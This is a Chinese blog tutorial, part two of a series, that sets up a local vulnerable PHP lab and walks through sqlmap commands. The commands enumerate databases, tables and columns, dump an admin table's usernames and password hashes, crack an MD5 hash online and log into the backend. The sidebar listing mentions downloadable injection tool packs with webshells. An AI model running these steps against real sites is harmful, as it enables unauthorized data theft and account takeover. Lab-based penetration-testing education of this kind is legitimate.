SQL注入基础步骤及SQLMap工具使用(二)

最新推荐文章于 2024-03-15 12:56:57 发布
最新推荐文章于 2024-03-15 12:56:57 发布
阅读量928 收藏 4
点赞数 1
分类专栏: 网络安全 文章标签: 网络安全 web完全 SQLMap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gaogzhen/article/details/80905995
版权

SQL注入基础步骤及SQLMap工具使用(二)

一、环境搭建

(一)、phpstudy2018集成环境安装使用

安装使用,自行百度,下载地址:官网地址

1. http://phpstudy.php.cn/

(二)、SQL注入源码

百度网盘:

1. 链接:https://pan.baidu.com/s/1B0VSwXk6JnZbBpRgr5S3iQ 密码:wgze

 (三)、SQLMap

SQLMap为Kali Linux平台集成工具

图示:

 

(四)、图示

目标网站:

1. http://localhost/sqls/index.php?id=1

 

二、SQL注入过程详解

(一)、查找注入点

       前面已经讲过不在赘述,注入点:

1. 1.http://localhost/sqls/index.php?id=1

(二)、SQLMap测试注入

1. sqlmap -u "http://192.168.21.100/sqls/index.php?id=1"

结果:

 

 (三)、获取后台账号、密码

    (1)、获取目标数据库

1. root@kali:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" --dbs

图示:

 

(2)、获取目标表名

root@kali:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" -D test --tables

图示:

 

   (3)、获取目标字段

1. root@kali:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" -D test -T admin --columns

图示:

 

(4)、获取字段内容

1. root@kali:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" -D test -T admin -C "user,pwd" --dump

图示:

 

(5)、MD5在线破解

网站:

1. http://www.cmd5.com/

结果:密码-qazxsw

三、登录后台

图示:

 

最后说明:

以上只是SQLMap简单实用,参考:https://blog.csdn.net/qq1124794084/article/details/77851094想了解更多,可自行百度。

gaog2zh
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试工具sqlmap基础教程
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
超级SQL注入工具
03-31
超级SQL注入工具
sqlmap注入使用教程
热门推荐
黑面狐
09-05 8万+
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项   目标:至少要选中一个参数     -u URL, --url=URL   目标为 URL (例如. "ht
Sqlmap
mumuzi2的博客
02-25 392
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
SQL注入+sqlmap使用
07-04
SQL注入+sqlmap使用SQL注入+sqlmap使用SQL注入+sqlmap使用
SQL注入SQLMap
qq_53218512的博客
07-24 1089
Sqlmap是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。目前支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access等大多数据库。
SQL注入使用brupSuite辅助注入、sqlmap使用
最新发布
05-30
sqlmap是一款强大的自动化SQL注入工具,它可以自动检测并利用SQL注入漏洞,执行各种操作如提取数据、控制服务器等。 **3.1 准备工作** - 确保已经安装了sqlmap。 - 获取目标网站的URL或存在潜在漏洞的参数。 **...
网络安全 sql注入工具sqlmap使用
01-13
网络安全sql注入工具sqlmap使用 Sqlmap是当前最流行的sql注入工具之一,广泛应用于网络安全领域,特别是在渗透测试和漏洞扫描领域。Sqlmap可以自动检测和利用SQL注入漏洞,获取数据库敏感信息,包括数据库结构、...
sql注入攻击之sqlmap
06-10
SQLMap是一款自动化工具,专为检测和利用SQL注入漏洞而设计,尤其适合信息安全初学者。 SQLMap的工作原理基于探测、枚举、数据提取和权限提升等步骤。首先,它会尝试探测目标站点是否存在SQL注入漏洞,这通常通过...
使用sqlmap+burpsuite进行中级sql注入
06-01
以上步骤展示了如何结合sqlmap和BurpSuite进行中级SQL注入的流程。在实际的渗透测试中,这只是一个开始,因为SQL注入可能涉及更复杂的查询构造、盲注、时间基注入等技术。同时,为了确保合法性和合规性,这些操作仅...
sql注入扫描_sqlmap-1.1.3.zip
02-13
SQLMap是一款强大的自动化SQL注入工具,它可以帮助安全研究人员或者渗透测试人员检测网站是否存在SQL注入漏洞。在版本sqlmap-1.1.3中,该工具已经兼容Python3,这扩大了它的使用范围,因为Python3逐渐成为主流的编程...
sqlmap用于sql注入
10-27
用于sql注入的强大工具,需要python运行环境,我提交的资源列表里有。免python版我也提供啦,但是我自己跑的时候有点问题,所以还是强烈推荐这款,运行稳定,功能强大,而且是比较新的版本,欢迎下载,物超所值。
SQL注入工具
03-17
SQL注入工具包,明小子,各类大马 小马 。啊d注入工具,浅蓝等
SQL注入sqlmap使用
06-13
SQL注入sqlmap使用,支持一下,谢谢,可以了解一下。
详解强大的SQL注入工具——SQLMAP
05-09
这是一个审计数据库安全的SQL注入工具使用指南, 该工具在windows平台与linux平台下均可以使用。数据库管理员(DBA)可用它来检 验自己的数据库是否存在安全配置方面的漏洞。
SQL注入工具sqlmap使用
浅笑996的博客
09-15 614
sqlmap使用 测试注入点 sqlmap -u “URL” 爆数据库 sqlmap -u “URL” –dbs 查看当前库 sqlmap -u “URL” –current -db 显示数据表 sqlmap -u “URL” -D 数据库 –tables 显示字段 sqlmap -u “URL” -D 数据库 -T 表 –columns 脱库 ...
SQL注入sqlmap
GoHeaven1119的博客
05-07 237
这篇讲的还是比较详细易于理解的:https://www.2cto.com/article/201310/250877.html
SQL注入Sqlmap使用指南(手把手保姆版)持续更新
开水的博客
03-15 2万+
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
sqlmap sql注入
qq_15946361的博客
09-03 280
在appscan上扫描出了SQL盲注,进一步验证是不是误报 对SQLmap进行了一系列乱操作 (第一次被迫接触安全方面) 首先搭建了环境 python sqlmap就不细说了 python sqlmap.py -u “http://xxxxxx” --current-db 查看当前数据库名 python sqlmap.py -u “http://xxxxxxx” --users 查看用户 第天我兴冲冲地像项目经理汇报问题,开发一顿操作 ,然后复测,然后就出问题了。我第一次玩这个东西,不知道要清
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaog2zh

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值